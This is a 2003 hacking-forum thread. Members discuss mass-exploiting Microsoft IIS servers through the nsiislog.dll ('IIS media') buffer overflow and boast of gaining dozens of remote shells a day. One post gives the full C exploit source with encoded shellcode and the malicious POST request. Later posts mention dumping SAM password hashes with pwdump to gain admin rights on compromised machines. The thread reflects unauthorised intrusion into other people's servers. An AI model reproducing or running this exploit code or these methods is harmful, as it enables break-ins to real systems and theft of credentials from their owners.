Action
Sep 20 2003, 09:16 AM
i have tried to xploit with iismedia.exe and no luck
what i do is
C:\>iismedia *.*.*.84 80
Successfully exploited *.*.*.84 (80)
C:\>telnet *.*.*.84 34816
Connecting To *.*.*.84 ...Could not open a connection to host on port 34816
: Connect failed
that happend for all over like 100 results,am i doing something wrong or what?
chrispen
Sep 20 2003, 09:19 AM
nope , you are doing good , it is just the sploit is ...dead
Action
Sep 20 2003, 09:44 AM
another question
i tried apache chuncked, and it always says Ooops.. hehehe!
what da F**CK does that mean
and what port do i connect to? with telnet
)Oni(
Sep 26 2003, 04:31 PM
sorry but i cant understand how i y can get 30 shells
i have the same problem - the standart exploit & authaxxor is 97% dead
which Exploit do you use MpR can you post it here ?
When it isnt public - trade
sorry for bad english - im german
Oni
MpR
Sep 26 2003, 04:19 AM
Man I probably get 40 shells a day with IIS media 20 - 30 of those are fully rootable. The exploit isnt dead probably just the tools youre using or the ranges youre hitting .. over and over and over again
Action
Sep 26 2003, 07:45 PM
if someone could compile this code
this is origiginal iismedia sploit:
#include <stdio.h>
#include <winsock2.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
char *hostName = NULL;
unsigned char shellcode[]=
"\x90\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90\x90"
"\x90\x8b\xc5\x33\xc9\x66\xb9\x10\x03\x50\x80\x30\x97\x40\xe2\xfa"
"\x7e\x8e\x95\x97\x97\xcd\x1c\x4d\x14\x7c\x90\xfd\x68\xc4\xf3\x36"
"\x97\x97\x97\x97\xc7\xf3\x1e\xb2\x97\x97\x97\x97\xa4\x4c\x2c\x97"
"\x97\x77\xe0\x7f\x4b\x96\x97\x97\x16\x6c\x97\x97\x68\x28\x98\x14"
"\x59\x96\x97\x97\x16\x54\x97\x97\x96\x97\xf1\x16\xac\xda\xcd\xe2"
"\x70\xa4\x57\x1c\xd4\xab\x94\x54\xf1\x16\xaf\xc7\xd2\xe2\x4e\x14"
"\x57\xef\x1c\xa7\x94\x64\x1c\xd9\x9b\x94\x5c\x16\xae\xdc\xd2\xc5"
"\xd9\xe2\x52\x16\xee\x93\xd2\xdb\xa4\xa5\xe2\x2b\xa4\x68\x1c\xd1"
"\xb7\x94\x54\x1c\x5c\x94\x9f\x16\xae\xd0\xf2\xe3\xc7\xe2\x9e\x16"
"\xee\x93\xe5\xf8\xf4\xd6\xe3\x91\xd0\x14\x57\x93\x7c\x72\x94\x68"
"\x94\x6c\x1c\xc1\xb3\x94\x6d\xa4\x45\xf1\x1c\x80\x1c\x6d\x1c\xd1"
"\x87\xdf\x94\x6f\xa4\x5e\x1c\x58\x94\x5e\x94\x5e\x94\xd9\x8b\x94"
"\x5c\x1c\xae\x94\x6c\x7e\xfe\x96\x97\x97\xc9\x10\x60\x1c\x40\xa4"
"\x57\x60\x47\x1c\x5f\x65\x38\x1e\xa5\x1a\xd5\x9f\xc5\xc7\xc4\x68"
"\x85\xcd\x1e\xd5\x93\x1a\xe5\x82\xc5\xc1\x68\xc5\x93\xcd\xa4\x57"
"\x3b\x13\x57\xe2\x6e\xa4\x5e\x1d\x99\x13\x5e\xe3\x9e\xc5\xc1\xc4"
"\x68\x85\xcd\x3c\x75\x7f\xd1\xc5\xc1\x68\xc5\x93\xcd\x1c\x4f\xa4"
"\x57\x3b\x13\x57\xe2\x6e\xa4\x5e\x1d\x99\x17\x6e\x95\xe3\x9e\xc5"
"\xc1\xc4\x68\x85\xcd\x3c\x75\x70\xa4\x57\xc7\xd7\xc7\xd7\xc7\x68"
"\xc0\x7f\x04\xfd\x87\xc1\xc4\x68\xc0\x7b\xfd\x95\xc4\x68\xc0\x67"
"\xa4\x57\xc0\xc7\x27\x9b\x3c\xcf\x3c\xd7\x3c\xc8\xdf\xc7\xc0\xc1"
"\x3a\xc1\x68\xc0\x57\xdf\xc7\xc0\x3a\xc1\x3a\xc1\x68\xc0\x57\xdf"
"\x27\xd3\x1e\x90\xc0\x68\xc0\x53\xa4\x57\x1c\xd1\x63\x1e\xd0\xab"
"\x1e\xd0\xd7\x1c\x91\x1e\xd0\xaf\xa4\x57\xf1\x2f\x96\x96\x1e\xd0"
"\xbb\xc0\xc0\xa4\x57\xc7\xc7\xc7\xd7\xc7\xdf\xc7\xc7\x3a\xc1\xa4"
"\x57\xc7\x68\xc0\x5f\x68\xe1\x67\x68\xc0\x5b\x68\xe1\x6b\x68\xc0"
"\x5b\xdf\xc7\xc7\xc4\x68\xc0\x63\x1c\x4f\xa4\x57\x23\x93\xc7\x56"
"\x7f\x93\xc7\x68\xc0\x43\x1c\x67\xa4\x57\x1c\x5f\x22\x93\xc7\xc7"
"\xc0\xc6\xc1\x68\xe0\x3f\x68\xc0\x47\x14\xa8\x96\xeb\xb5\xa4\x57"
"\xc7\xc0\x68\xa0\xc1\x68\xe0\x3f\x68\xc0\x4b\x9c\x57\xe3\xb8\xa4"
"\x57\xc7\x68\xa0\xc1\xc4\x68\xc0\x6f\xfd\xc7\x68\xc0\x77\x7c\x5f"
//¿?¿?¿?¿?¿?¿?¿?¿?¿?¿?SHELLCODE¿?¿?¿?¿?¿? \xc0\x6b\xa4\x5e\xc6\xc7¿?
//¿?WRITEFILE¿?¿?¿?2¿?¿?¿?¿?¿?¿?¿?¿?¿?¿?¿?¿?¿?¿?¿?
"\xa4\x57\xc7\x23\x93\xc7\xc1\xc4\x68\xc0\x6b\xa4\x5e\xc6\xc0\xc7"
"\xc1\x68\xe0\x3b\x68\xc0\x4f\xfd\xc7\x68\xc0\x77\x7c\x3d\xc7\x68"
"\xc0\x73\x7c\x69\xcf\xc7\x1e\xd5\x65\x54\x1c\xd3\xb3\x9b\x92\x2f"
"\x97\x97\x97\x50\x97\xef\xc1\xa3\x85\xa4\x57\x54\x7c\x7b\x7f\x75"
"\x6a\x68\x68\x7f\x05\x69\x68\x68\xdc\xc1\x70\xe0\xb4\x17\x70\xe0"
"\xdb\xf8\xf6\xf3\xdb\xfe\xf5\xe5\xf6\xe5\xee\xd6\x97\xdc\xd2\xc5"
"\xd9\xd2\xdb\xa4\xa5\x97\xd4\xe5\xf2\xf6\xe3\xf2\xc7\xfe\xe7\xf2"
"\x97\xd0\xf2\xe3\xc4\xe3\xf6\xe5\xe3\xe2\xe7\xde\xf9\xf1\xf8\xd6"
"\x97\xd4\xe5\xf2\xf6\xe3\xf2\xc7\xe5\xf8\xf4\xf2\xe4\xe4\xd6\x97"
"\xd4\xfb\xf8\xe4\xf2\xdf\xf6\xf9\xf3\xfb\xf2\x97\xc7\xf2\xf2\xfc"
"\xd9\xf6\xfa\xf2\xf3\xc7\xfe\xe7\xf2\x97\xd0\xfb\xf8\xf5\xf6\xfb"
"\xd6\xfb\xfb\xf8\xf4\x97\xc0\xe5\xfe\xe3\xf2\xd1\xfe\xfb\xf2\x97"
"\xc5\xf2\xf6\xf3\xd1\xfe\xfb\xf2\x97\xc4\xfb\xf2\xf2\xe7\x97\xd2"
"\xef\xfe\xe3\xc7\xe5\xf8\xf4\xf2\xe4\xe4\x97\x97\xc0\xc4\xd8\xd4"
"\xdc\xa4\xa5\x97\xe4\xf8\xf4\xfc\xf2\xe3\x97\xf5\xfe\xf9\xf3\x97"
"\xfb\xfe\xe4\xe3\xf2\xf9\x97\xf6\xf4\xf4\xf2\xe7\xe3\x97\xe4\xf2"
"\xf9\xf3\x97\xe5\xf2\xf4\xe1\x97\x95\x97\x89\xfb\x97\x97\x97\x97"
"\x97\x97\x97\x97\x97\x97\x97\x97\xf4\xfa\xf3\xb9\xf2\xef\xf2\x97"
"\x68\x68\x68\x68";
void main (int argc, char **argv)
{
WSADATA WSAData;
SOCKET s;
SOCKADDR_IN addr_in;
unsigned char buf[1000];
unsigned char testbuf[0x10000];
int len;
char t1[]="POST /scripts/nsiislog.dll HTTP/1.1\r\nHost: 192.168.10.210\r\nContent-length: 65536\r\n\r\n";//4364
if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
{
printf("WSAStartup error.Error:%d\n",WSAGetLastError());
return;
}
hostName = argv[1];
addr_in.sin_family=AF_INET;
addr_in.sin_port=htons(80);
addr_in.sin_addr.S_un.S_addr=inet_addr(hostName);
memset(testbuf,0,0x10000);
if ((s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)
{
printf("Socket failed.Error:%d\n",WSAGetLastError());
return;
}
if(WSAConnect(s,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR)
{
printf("Connect failed.Error:%d",WSAGetLastError());
return;
}
len=sizeof(t1)-1;
memcpy(testbuf,t1,len);
send(s,testbuf,len,0);
recv(s,buf,1000,0);
memset(testbuf,'A',65536);//4364
len=65536;//4364;
*(DWORD *)(testbuf+0x2704)=0x04eb06eb;//jmp¿?¿?¿?¿?¿?¿?¿?¿?
*(DWORD *)(testbuf+0x2708)=0x40F0135c;//¿?¿?¿?¿?¿?¿?¿?¿?
memcpy(testbuf+0x270c,shellcode,sizeof(shellcode));
send(s,testbuf,len,0);
closesocket (s);
WSACleanup();
return;
}
CraZy_A
Sep 26 2003, 09:25 PM
this exploit is useless you need to put in the source the ip and compile it...
the exploit of firew0rker is way better
GhostCow
Sep 27 2003, 12:27 PM
| QUOTE (MpR @ Sep 26 2003, 04:19 AM) |
| Man I probably get 40 shells a day with IIS media 20 - 30 of those are fully rootable. The exploit isnt dead probably just the tools youre using or the ranges youre hitting .. over and over and over again |
man, either yur full of sh** or your a freggin' genius... please tell us - what tools are u using?

PS: CraZy_A - please show us how your exploit works too...
-CUT
Sep 30 2003, 05:40 PM
yes this exploit works, but only few of em i get adming rights.. or how to write it

heh
MpR
Sep 30 2003, 09:19 PM
GhostCow Why are you here? this site requires reading and if you do read everythign you need is listed within this site. Sorry for being so blunt but its tiresome looking at the posts and seeeing people wanting everythign handed to them .. The best thing I can give to you is
1) READ or Learn how too
2) www.google.com
3) Beginners Section
I dont know where you are from but reading starts manditory in our country at grade 2 .. Everythign is posted in this site use it
Im not going to give you the files because 3/4 of the exploit is education
Once again sory for putting it so bluntly but those who want to learn are probably in the same position I am .. sick of those who want it handed over not to work a little bit and read .
Gotisch
Sep 30 2003, 10:23 PM
haha one time testing a server with media.
i tryed to get vnc access only to close all the norton antivirus popups that opened when those "hackers" startet getad.exe crackiss.dll aso...
though i even manged to get that password from the registry ( that was (filtered) hard ^^ tryed 3 command line registry tools before i found reg.exe from ms

) but that pass didnt work

. if that would have been a real server. the admin would have had (!) a big suprise when connecting to his server

poor guy. Thnx god it was only one of my servers
CraZy_A
Oct 3 2003, 01:49 AM
| QUOTE (MpR @ Sep 26 2003, 04:19 AM) |
| Man I probably get 40 shells a day with IIS media 20 - 30 of those are fully rootable. The exploit isnt dead probably just the tools youre using or the ranges youre hitting .. over and over and over again |
ok i got shit load of shells as well but i aint hacking it untill i could protect it and service it.. i will just loose a good server...
btw what you do to get admin privs siriuslly... except for cracking the admin password... wich sometimes you dont have premmision to grab the sam file and ofcourse run pwdump and samdump